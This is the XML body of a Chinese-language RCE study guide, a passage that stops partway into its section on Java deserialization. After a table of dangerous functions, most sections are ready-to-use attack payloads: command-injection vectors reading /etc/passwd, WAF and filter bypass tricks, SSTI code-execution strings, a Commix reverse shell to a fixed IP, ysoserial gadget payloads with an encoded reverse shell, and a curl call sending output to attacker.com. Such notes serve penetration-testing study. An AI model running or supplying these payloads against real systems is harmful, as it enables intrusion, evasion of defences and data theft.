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远程代码执行（RCE）漏洞实战指南</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>学习笔记 · 从原理到实战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一、漏洞产生条件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>RCE 分为代码执行和命令执行两类。必须同时满足：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**有可控的变量**：用户能控制传入函数的参数（GET/POST/Header/Cookie/文件内容等）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**危险函数**：后端代码存在可执行系统命令或代码的函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**执行环境**：解释器/系统能够解析执行传入的内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**语言特定危险函数速查表**：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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>语言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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>代码执行函数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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>命令执行函数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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>反序列化/动态加载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**PHP**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`eval()`, `assert()`, `preg_replace(/e)`, `create_function()`, `usort()`+`assert`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`system()`, `exec()`, `shell_exec()`, `passthru()`, `pcntl_exec()`, `popen()`, `proc_open()`, 反引号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`unserialize()`, 魔术方法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**Java**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`ScriptEngine.eval()`, `ELProcessor.eval()`, `SpringExpressionParser`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`Runtime.exec()`, `ProcessBuilder.start()`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`ObjectInputStream.readObject()`, `XMLDecoder`, `JNDI lookup()`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**Python**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`eval()`, `exec()`, `compile()`, `execfile()`(Py2)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`os.system()`, `os.popen()`, `subprocess.call()`, `subprocess.Popen()`, `pty.spawn()`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`pickle.loads()`, `yaml.load()`, `marshal.loads()`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**Node.js**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`eval()`, `Function()`, `vm.runInNewContext()`, `vm.runInThisContext()`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`child_process.exec()`, `child_process.execSync()`, `child_process.spawn()`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`require()` 动态加载, `vm` 沙箱逃逸, 原型链污染</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 PHP 中的 RCE 漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PHP 是 RCE 漏洞的高发区域，主要特征包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**危险函数**：`eval()`, `assert()`, `preg_replace()`（带/e修饰符）, `system()`, `exec()` 等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**弱类型转换**：PHP 的弱类型转换可能导致意外的代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**魔术方法**：`__wakeup()`, `__destruct()` 等在反序列化过程中可能被滥用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**文件包含**：文件包含漏洞（LFI/RFI）可能导致代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**关键区别**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`eval()` 执行 PHP 代码，而不是系统命令。要执行系统命令需用 `system()`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`system()` 直接输出命令结果到标准输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`exec()` 只返回最后一行，不直接输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`shell_exec()` 返回完整输出字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`passthru()` 直接输出原始二进制结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>反引号 `` ` `` 等价于 `shell_exec()`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Java 中的 RCE 漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Java 的 RCE 主要与类加载、序列化和反序列化有关：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**反序列化漏洞**：Apache Commons Collections 等库存在安全问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**类加载漏洞**：不安全的类加载可能导致恶意类被加载执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**表达式语言注入**：EL 表达式注入可能导致代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**JSP 注入**：JSP 页面中的动态内容可能导致代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Python 中的 RCE 漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Python 的 RCE 主要与动态代码执行和不安全导入有关：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**危险函数**：`exec()`, `eval()`, `execfile()`（Py2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**不安全的导入**：动态导入模块可能导致恶意代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**pickle 反序列化**：pickle 的反序列化功能存在安全问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**模板注入**：Jinja2 模板注入可能导致代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.4 Node.js 中的 RCE 漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Node.js 的 RCE 主要与 JS 的动态特性和模块系统有关：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**危险函数**：`eval()`, `Function` 构造函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**模块加载漏洞**：动态 `require` 可能导致恶意模块被加载</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**原型链污染**：原型链污染可能导致代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**命令注入**：通过 `child_process` 模块执行系统命令时存在安全问题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二、基本测试技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 命令分隔符测试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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>系统</w:t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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>分隔符</w:t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b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b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b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  <w:t>Unix/Linux</w:t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  <w:t>`;`, `&amp;&amp;`, `</w:t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  <w:t>`, `</w:t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  <w:t>`, `$()`, 反引号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  <w:t>Windows</w:t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  <w:t>`&amp;`, `&amp;&amp;`, `</w:t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  <w:t>`, `</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>`, `^`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 基础命令测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 时间延迟</w:t>
        <w:br/>
        <w:t>sleep 5          # Unix/Linux</w:t>
        <w:br/>
        <w:t>ping -n 5 127.0.0.1  # Windows</w:t>
        <w:br/>
        <w:br/>
        <w:t># 回显</w:t>
        <w:br/>
        <w:t>echo test</w:t>
        <w:br/>
        <w:br/>
        <w:t># 文件操作</w:t>
        <w:br/>
        <w:t>ls -la           # Unix/Linux</w:t>
        <w:br/>
        <w:t>dir              # Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 命令编码测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># URL 编码</w:t>
        <w:br/>
        <w:t>%3B 表示 ;</w:t>
        <w:br/>
        <w:t>%0A 表示换行</w:t>
        <w:br/>
        <w:br/>
        <w:t># Base64 编码</w:t>
        <w:br/>
        <w:t>echo 'aWQ=' | base64 -d | bash</w:t>
        <w:br/>
        <w:br/>
        <w:t># 十六进制编码</w:t>
        <w:br/>
        <w:t>printf '\x69\x64' | bash</w:t>
        <w:br/>
        <w:t>xxd -r -p &lt;&lt;&lt; '6964' | bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 测试向量示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>对于 `http://example.com/ping.php?ip=127.0.0.1`：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>?ip=127.0.0.1; cat /etc/passwd</w:t>
        <w:br/>
        <w:t>?ip=127.0.0.1 &amp;&amp; whoami</w:t>
        <w:br/>
        <w:t>?ip=127.0.0.1 || ls -la</w:t>
        <w:br/>
        <w:t>?ip=127.0.0.1%3B%20cat%20/etc/passwd   # URL编码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三、高级测试技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 双写绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 过滤 cat -&gt; ccaatt</w:t>
        <w:br/>
        <w:t>ccaatt /etc/passwd</w:t>
        <w:br/>
        <w:br/>
        <w:t># 过滤 ; -&gt; ;;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 空白字符替代</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 制表符替代空格</w:t>
        <w:br/>
        <w:t>cat%09/etc/passwd</w:t>
        <w:br/>
        <w:br/>
        <w:t># 换行符替代空格</w:t>
        <w:br/>
        <w:t>cat%0a/etc/passwd</w:t>
        <w:br/>
        <w:br/>
        <w:t># ${IFS} 替代空格（Unix/Linux）</w:t>
        <w:br/>
        <w:t>cat${IFS}/etc/passwd</w:t>
        <w:br/>
        <w:br/>
        <w:t># 重定向符替代空格</w:t>
        <w:br/>
        <w:t>cat&lt;/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 特殊字符转义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 反斜杠转义</w:t>
        <w:br/>
        <w:t>c\a\t /etc/passwd</w:t>
        <w:br/>
        <w:br/>
        <w:t># 引号包裹</w:t>
        <w:br/>
        <w:t>cat$IFS$1/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 命令拼接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a=ca;b=t;c=/etc/passwd;$a$b $c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四、自动化 RCE 检测工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 通用 Web 安全扫描器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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>工具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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>特性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**OWASP ZAP**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开源，包含 RCE 检测模块，支持自定义规则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**Burp Suite Professional**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商业工具，强大的 RCE 扫描，Turbo Intruder 扩展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**Acunetix**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商业漏洞扫描器，高效 RCE 检测引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 专门的 RCE 检测工具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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>工具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b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**SQLmap**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主要 SQL 注入，也含命令执行功能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**Commix**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专门命令注入工具，支持多种绕过技术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**Metasploit Framework**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综合渗透框架，大量 RCE 利用模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Commix 使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install commix</w:t>
        <w:br/>
        <w:br/>
        <w:t># 基础扫描</w:t>
        <w:br/>
        <w:t>python commix.py -u "http://target.com/cmd.php?ip=127.0.0.1"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 带 Cookie 和 WAF 绕过</w:t>
        <w:br/>
        <w:t>python commix.py -u "http://target.com/cmd.php" --data="ip=127.0.0.1" --cookie="PHPSESSID=xxx" --tamper="base64encode.py" --level=3</w:t>
        <w:br/>
        <w:br/>
        <w:t># 自动反弹 shell</w:t>
        <w:br/>
        <w:t>python commix.py -u "http://target.com/cmd.php?ip=127.0.0.1" --os-cmd="bash -i &gt;&amp; /dev/tcp/192.168.1.1/8888 0&gt;&amp;1"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五、RCE 绕过 WAF 技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 绕过输入过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**字符替换与编码**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>URL 编码：%3B 表示 ;</w:t>
        <w:br/>
        <w:t>双重 URL 编码：%253B</w:t>
        <w:br/>
        <w:t>Unicode 编码</w:t>
        <w:br/>
        <w:t>HTML 实体编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**命令分隔符替代**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Unix/Linux：; &amp;&amp; || | $() 反引号</w:t>
        <w:br/>
        <w:t>Windows：&amp; &amp;&amp; || | ^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**空格替代**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%09（制表符）</w:t>
        <w:br/>
        <w:t>%0a（换行符）</w:t>
        <w:br/>
        <w:t>${IFS}（Unix/Linux）</w:t>
        <w:br/>
        <w:t>重定向符 &lt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 绕过 WAF 高级技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**分块传输编码**：将恶意载荷分散在多个块中，绕过模式匹配。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**HTTP 参数污染**：利用多个同名参数的处理差异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>?ip=127.0.0.1&amp;ip=;cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**动态生成载荷**：运行时动态生成命令，避免静态特征检测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 无字母数字命令执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 通配符</w:t>
        <w:br/>
        <w:t>/???/??t /???/p??s??    # /bin/cat /etc/passwd</w:t>
        <w:br/>
        <w:t>/???/b??h               # /bin/bash</w:t>
        <w:br/>
        <w:br/>
        <w:t># Shell 变量</w:t>
        <w:br/>
        <w:t>${##}  # 1</w:t>
        <w:br/>
        <w:t>${#?}  # 1</w:t>
        <w:br/>
        <w:t>${PWD:${#}:${#}}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六、服务端模板注入（SSTI）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 常见模板引擎判断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{{ 7*7 }}          # Jinja2/Twig/Flask/Django -&gt; 49</w:t>
        <w:br/>
        <w:t>${ 7*7 }           # Spring/Thymeleaf/FreeMarker -&gt; 49</w:t>
        <w:br/>
        <w:t>&lt;%= 7*7 %&gt;         # ERB/Rails -&gt; 49</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Jinja2 (Python/Flask)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{{ config.items() }}</w:t>
        <w:br/>
        <w:t>{{ ''.__class__.__mro__[2].__subclasses__()[140].__init__.__globals__['system']('id') }}</w:t>
        <w:br/>
        <w:t>{{ ''.__class__.__base__.__subclasses__()[137].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()") }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Thymeleaf (Java/Spring)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>${T(java.lang.Runtime).getRuntime().exec('calc')}</w:t>
        <w:br/>
        <w:t>${''.getClass().forName('java.lang.Runtime').getRuntime().exec('id')}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 FreeMarker (Java)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>${"freemarker.template.utility.Execute"?new()("id")}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七、Java 反序列化 Gadget 链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Ysoserial 使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>java -jar ysoserial-all.jar --list</w:t>
        <w:br/>
        <w:t>java -jar ysoserial-all.jar CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS81NTUgMD4mMQ==}|{base64,-d}|{bash,-i}' &gt; payload.ser</w:t>
        <w:br/>
        <w:t>java -jar ysoserial-all.jar URLDNS 'http://your-id.oast.pro' &gt; dns_payload.ser</w:t>
        <w:br/>
        <w:t>java -jar ysoserial-all.jar Spring1 'curl http://attacker.com/$(whoami)' &gt; spring_payload.ser</w:t>
        <w:br/>
        <w:t>java -jar ysoserial-all.jar Jdk7u21 'id' &gt; jdk_payload.ser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 手动构造 POP 链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
